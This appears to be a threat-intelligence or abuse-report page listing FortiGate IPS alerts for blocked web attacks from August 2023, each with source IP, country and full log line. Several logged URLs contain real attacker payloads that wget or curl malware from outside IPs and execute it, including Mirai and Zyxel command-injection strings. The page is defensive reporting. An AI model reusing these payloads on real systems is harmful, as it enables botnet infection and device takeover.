|
๐ท๐ด
92.118.39.245
|
|
date=2023-08-26 time=02:24:09 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16930058493155603 ...
show more
date=2023-08-26 time=02:24:09 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693005849315560308 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=92.118.39.245 srccountry="Romania" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28439649 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Multiple.Routers.GPON.formLogin.Remote.Command.Injection" srcport=60368 dstport=80 hostname="136.255.207.206" url="/boaform/admin/formLogin" agent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" httpmethod="POST" referralurl="http://136.255.207.206:80/admin/login.asp" direction="outgoing" attackid=52588 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52588" incidentserialno=5502267 msg="applications3: Multiple.Routers.GPON.formLogin.Remote.Command.
show less
|
Web App Attack
|
|
๐ป๐ณ
115.78.10.124
|
|
date=2023-08-26 time=11:53:47 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16930400273607684 ...
show more
date=2023-08-26 time=11:53:47 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693040027360768488 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=115.78.10.124 srccountry="Vietnam" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28566415 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="AndroxGh0st.Malware" srcport=33000 dstport=80 hostname="81.196.84.26" url="/api" agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" httpmethod="POST" direction="outgoing" attackid=52567 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52567" incidentserialno=5503929 msg="misc: AndroxGh0st.Malware" crscore=30 craction=8192 crlevel="high"
show less
|
Web App Attack
|
|
๐จ๐ณ
103.59.112.92
|
|
date=2023-08-26 time=21:07:59 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16930732790223128 ...
show more
date=2023-08-26 time=21:07:59 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693073279022312816 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=103.59.112.92 srccountry="China" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28707588 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Mirai.Botnet" srcport=41690 dstport=80 hostname="127.0.0.1" url="/shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws" agent="Hello, world" httpmethod="GET" direction="outgoing" attackid=43191 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID43191" incidentserialno=5505183 msg="backdoor: Mirai.Botnet" crscore=30 craction=8192 crlevel="high"
show less
|
Web App Attack
|
|
๐จ๐ณ
101.74.200.170
|
|
date=2023-08-27 time=08:19:13 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931135530258058 ...
show more
date=2023-08-27 time=08:19:13 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693113553025805811 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=101.74.200.170 srccountry="China" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28851293 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Mirai.Botnet" srcport=53934 dstport=80 hostname="127.0.0.1" url="/shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws" agent="Hello, world" httpmethod="GET" direction="outgoing" attackid=43191 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID43191" incidentserialno=5506475 msg="backdoor: Mirai.Botnet" crscore=30 craction=8192 crlevel="high
show less
|
Web App Attack
|
|
๐ฉ๐ช
176.97.210.61
|
|
date=2023-08-27 time=09:01:50 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931161109300524 ...
show more
date=2023-08-27 time=09:01:50 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693116110930052456 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=176.97.210.61 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28860360 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Multiple.Routers.GPON.formLogin.Remote.Command.Injection" srcport=52536 dstport=80 hostname="81.196.84.26" url="/boaform/admin/formLogin" agent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" httpmethod="POST" referralurl="http://81.196.84.26:80/admin/login.asp" direction="outgoing" attackid=52588 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52588" incidentserialno=5506585 msg="applications3: Multiple.Routers.GPON.formLogin.Remote.C
show less
|
Web App Attack
|
|
๐ณ๐ฑ
94.156.6.167
|
|
date=2023-08-27 time=09:07:43 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931164632117431 ...
show more
date=2023-08-27 time=09:07:43 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693116463211743199 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=94.156.6.167 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28861572 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="AndroxGh0st.Malware" srcport=55635 dstport=80 hostname="api.gn.directpharma.ro" url="/" agent="Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" httpmethod="POST" direction="outgoing" attackid=52567 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52567" incidentserialno=5506592 msg="misc: AndroxGh0st.Malware" crscore=30 craction=8192 crlevel="high"
show less
|
Web App Attack
|
|
๐ซ๐ท
213.5.130.61
|
|
date=2023-08-27 time=12:25:57 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931283573748433 ...
show more
date=2023-08-27 time=12:25:57 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693128357374843339 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=213.5.130.61 srccountry="France" dstip=192.168.10.12 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28904437 action="dropped" proto=6 service="HTTP" policyid=79 poluuid="77aa622c-b8d9-51ed-64c5-d67d0270f5a9" policytype="policy" attack="HTTP.Unix.Shell.IFS.Remote.Code.Execution" srcport=48634 dstport=80 hostname="81.196.84.26" url="/online&kill-id=1;sudo$%7BIFS%7Dcurl$%7BIFS%7Dhttp://45.95.147.183/b.sh$%7BIFS%7D%7C$%7BIFS%7Dbash;" agent="python-requests/2.25.1" httpmethod="GET" direction="outgoing" attackid=45677 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID45677" incidentserialno=5507154 msg="misc: HTTP.Unix.Shell.IFS.Remote.Code.Execution" crscore=30 craction=8192 crlevel="high"
show less
|
Web App Attack
|
|
๐ฉ๐ช
81.161.229.149
|
|
date=2023-08-27 time=12:58:17 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931302977652192 ...
show more
date=2023-08-27 time=12:58:17 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693130297765219275 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=81.161.229.149 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28911817 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="AndroxGh0st.Malware" srcport=63620 dstport=80 hostname="81.196.84.26" url="/" agent="Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" httpmethod="POST" direction="outgoing" attackid=52567 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52567" incidentserialno=5507206 msg="misc: AndroxGh0st.Malware" crscore=30 craction=8192 crlevel="high"
show less
|
Web App Attack
|
|
๐ท๐บ
83.97.73.87
|
|
date=2023-08-30 time=13:07:19 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933900394376840 ...
show more
date=2023-08-30 time=13:07:19 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693390039437684001 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=83.97.73.87 srccountry="Russian Federation" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30830000 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Generic.XXE.Detection" srcport=53122 dstport=80 hostname="81.196.84.26" url="/Autodiscover/Autodiscover.xml" agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" httpmethod="POST" direction="outgoing" attackid=32416 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID32416" incidentserialno=5816284 msg="applications3: Generic.XXE.Detection" crscore=30 craction=8192 crlevel="high"
show less
|
Web App Attack
|
|
๐บ๐ธ
85.239.240.253
|
|
date=2023-08-27 time=14:26:52 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931356128546007 ...
show more
date=2023-08-27 time=14:26:52 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693135612854600753 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=85.239.240.253 srccountry="United States" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28931883 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="AndroxGh0st.Malware" srcport=58809 dstport=80 hostname="136.255.207.206" url="/" agent="Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" httpmethod="POST" direction="outgoing" attackid=52567 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52567" incidentserialno=5507443 msg="misc: AndroxGh0st.Malware" crscore=30 craction=8192 crlevel="high"
show less
|
Web App Attack
|
|
๐ญ๐ฐ
219.79.89.33
|
|
date=2023-08-27 time=14:38:20 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931363004857227 ...
show more
date=2023-08-27 time=14:38:20 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693136300485722777 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=219.79.89.33 srccountry="Hong Kong" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28934906 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Zyxel.zhttpd.Webserver.Command.Injection" srcport=51972 dstport=443 url="/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://176.97.210.211/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;" httpmethod="GET" direction="outgoing" attackid=53200 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID53200" incidentserialno=5507456 msg="applications3: Zyxel.zhttpd.Webserver.Command.Injection" crscore=50 craction=4096
show less
|
Web App Attack
|
|
๐ฉ๐ช
193.35.18.177
|
|
date=2023-08-27 time=18:38:12 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931506927322765 ...
show more
date=2023-08-27 time=18:38:12 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693150692732276577 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=193.35.18.177 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28990216 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="PHPUnit.Eval-stdin.PHP.Remote.Code.Execution" srcport=42536 dstport=80 hostname="81.196.84.26" url="/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" agent="Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" httpmethod="GET" direction="outgoing" attackid=45765 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID45765" incidentserialno=5507959 msg="web_server: PHPUnit.Eval-stdin.PHP.Remote.Code.Execution" crscor
show less
|
Web App Attack
|
|
๐ง๐ช
45.156.128.12
|
|
date=2023-08-28 time=00:45:59 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931727597782854 ...
show more
date=2023-08-28 time=00:45:59 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693172759778285480 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=45.156.128.12 srccountry="Portugal" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=29071821 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="MS.Windows.HTTP.sys.Request.Handling.Remote.Code.Execution" srcport=43058 dstport=80 hostname="136.255.207.206" url="/" agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" httpmethod="GET" direction="outgoing" attackid=40402 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID40402" incidentserialno=5508710 msg="web_server: MS.Windows.HTTP.sys.Request.Handling.Remote.Code.Execution" crscore=50 craction=4096
show less
|
Web App Attack
|
|
๐ฌ๐ง
157.231.51.20
|
|
date=2023-08-28 time=13:10:59 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16932174591662172 ...
show more
date=2023-08-28 time=13:10:59 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693217459166217251 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=157.231.51.20 srccountry="United Kingdom" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=29437804 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Zyxel.zhttpd.Webserver.Command.Injection" srcport=36061 dstport=443 url="/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103.110.33.164/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;" httpmethod="GET" direction="outgoing" attackid=53200 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID53200" incidentserialno=5581036 msg="applications3: Zyxel.zhttpd.Webserver.Command.Injection" crscore=50 craction=4096
show less
|
Web App Attack
|
|
๐จ๐ณ
111.42.95.131
|
|
date=2023-08-28 time=19:38:12 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16932406925861779 ...
show more
date=2023-08-28 time=19:38:12 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693240692586177946 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=111.42.95.131 srccountry="China" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=29677469 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Apache.HTTP.Server.cgi-bin.Path.Traversal" srcport=60824 dstport=80 hostname="136.255.207.206" url="/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh" agent="Custom-AsyncHttpClient" httpmethod="POST" direction="outgoing" attackid=50825 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID50825" incidentserialno=5637412 msg="apache: Apache.HTTP.Server.cgi-bin.Path.Traversal" crscore=30 craction=8192 crlevel="high"
show less
|
Web App Attack
|
|
๐จ๐ณ
14.122.168.114
|
|
date=2023-08-29 time=11:19:44 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16932971847286751 ...
show more
date=2023-08-29 time=11:19:44 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693297184728675152 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=14.122.168.114 srccountry="China" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30037482 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Zivif.PR115-204-P-RS.Web.Cameras.Credentials.Disclosure" srcport=22800 dstport=80 hostname="81.196.84.26" url="/web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr" agent="Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" httpmethod="GET" direction="outgoing" attackid=45492 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID45492" incidentserialno=5680118 msg="applications: Zivif.PR115-204-P-RS.Web.Cameras.Credentials.Disclosure" crscore=50
show less
|
Web App Attack
|
|
๐ฎ๐ณ
198.23.251.118
|
|
date=2023-08-29 time=12:02:45 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16932997658646614 ...
show more
date=2023-08-29 time=12:02:45 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693299765864661481 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=198.23.251.118 srccountry="United States" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30071125 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Atlassian.Confluence.CVE-2021-26084.Remote.Code.Execution" srcport=44104 dstport=80 hostname="81.196.84.26" url="/pages/createpage-entervariables.action" agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" httpmethod="POST" direction="outgoing" attackid=50727 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID50727" incidentserialno=5688539
show less
|
Web App Attack
|
|
๐ท๐บ
83.97.73.87
|
|
date=2023-08-29 time=12:23:34 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933010149105234 ...
show more
date=2023-08-29 time=12:23:34 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693301014910523476 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="medium" srcip=83.97.73.87 srccountry="Russian Federation" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30087433 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Apache.Solr.SolrResourceLoader.Directory.Traversal" srcport=54008 dstport=80 hostname="81.196.84.26" url="/solr/admin/info/system?wt=json" agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" httpmethod="GET" direction="outgoing" attackid=37677 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID37677" incidentserialno=5692502 msg="apache: Apache.Solr.SolrResourceLoader.Directory.Traversal"
show less
|
Web App Attack
|
|
๐ป๐ณ
14.225.252.51
|
|
date=2023-08-29 time=13:18:55 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933043358276208 ...
show more
date=2023-08-29 time=13:18:55 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693304335827620827 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=14.225.252.51 srccountry="Vietnam" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30128330 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Dasan.GPON.Remote.Code.Execution" srcport=53664 dstport=80 url="/GponForm/diag_Form?images/" agent="Hello, World" httpmethod="POST" direction="outgoing" attackid=46083 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID46083" incidentserialno=5699587 msg="applications3: Dasan.GPON.Remote.Code.Execution" crscore=50 craction=4096 crlevel="critical"
show less
|
Web App Attack
|
|
๐ฎ๐ณ
43.158.213.246
|
|
date=2023-08-29 time=13:46:16 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933059765750983 ...
show more
date=2023-08-29 time=13:46:16 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693305976575098371 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=43.158.213.246 srccountry="India" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30150983 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Backdoor.Cobalt.Strike.Beacon" srcport=34996 dstport=80 hostname="81.196.84.26" url="/jquery-3.3.1.min.js" agent="'Mozilla/5.0" httpmethod="GET" referralurl="http://code.jquery.com/" direction="outgoing" attackid=39078 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID39078" incidentserialno=5703264 msg="backdoor: Backdoor.Cobalt.Strike.Beacon" crscore=30 craction=8192 crlevel="high"
show less
|
Web App Attack
|
|
๐ณ๐ฑ
141.98.6.77
|
|
date=2023-08-29 time=15:14:02 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933112426411919 ...
show more
date=2023-08-29 time=15:14:02 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693311242641191928 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=141.98.6.77 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30229566 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="AndroxGh0st.Malware" srcport=56642 dstport=80 hostname="81.196.84.26" url="/" agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" httpmethod="POST" direction="outgoing" attackid=52567 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52567" incidentserialno=5718470 msg="misc: AndroxGh0st.Malware" crscore=30 craction=8192 crlevel="high"
show less
|
Web App Attack
|
|
๐ณ๐ฑ
84.54.51.146
|
|
date=2023-08-29 time=15:34:18 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933124589570660 ...
show more
date=2023-08-29 time=15:34:18 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693312458957066028 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=84.54.51.146 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30247363 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Multiple.Routers.GPON.formLogin.Remote.Command.Injection" srcport=46622 dstport=80 hostname="81.196.84.26" url="/boaform/admin/formLogin" agent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" httpmethod="POST" referralurl="http://81.196.84.26:80/admin/login.asp" direction="outgoing" attackid=52588 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52588" incidentserialno=5722681 msg="applications3: Multiple.Routers.GPON.formLogin.Remote
show less
|
Web App Attack
|
|
๐ง๐ช
45.156.128.7
|
|
date=2023-08-29 time=18:22:07 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933225272091686 ...
show more
date=2023-08-29 time=18:22:07 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693322527209168682 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=45.156.128.7 srccountry="Portugal" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30333313 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Telerik.Web.UI.RadAsyncUpload.Handling.Arbitrary.File.Upload" srcport=57766 dstport=80 hostname="81.196.84.26" url="/Telerik.Web.UI.WebResource.axd?type=rau" agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" httpmethod="GET" direction="outgoing" attackid=48789 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID48789" incidentserialno=5735552 msg="applications3: Telerik.Web.UI.RadAsyncUpload
show less
|
Web App Attack
|
|
๐ฌ๐บ
202.128.92.209
|
|
date=2023-08-29 time=18:37:36 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933234568364041 ...
show more
date=2023-08-29 time=18:37:36 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693323456836404196 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=202.128.92.209 srccountry="Guam" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30338066 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Zyxel.zhttpd.Webserver.Command.Injection" srcport=52158 dstport=443 url="/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://176.97.210.211/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;" httpmethod="GET" direction="outgoing" attackid=53200 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID53200" incidentserialno=5735741 msg="applications3: Zyxel.zhttpd.Webserver.Command.Injection" crscore=50 craction=4096 crlevel="critic
show less
|
Web App Attack
|
|
๐ณ๐ฑ
84.54.51.99
|
|
date=2023-08-29 time=20:07:18 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933288383776069 ...
show more
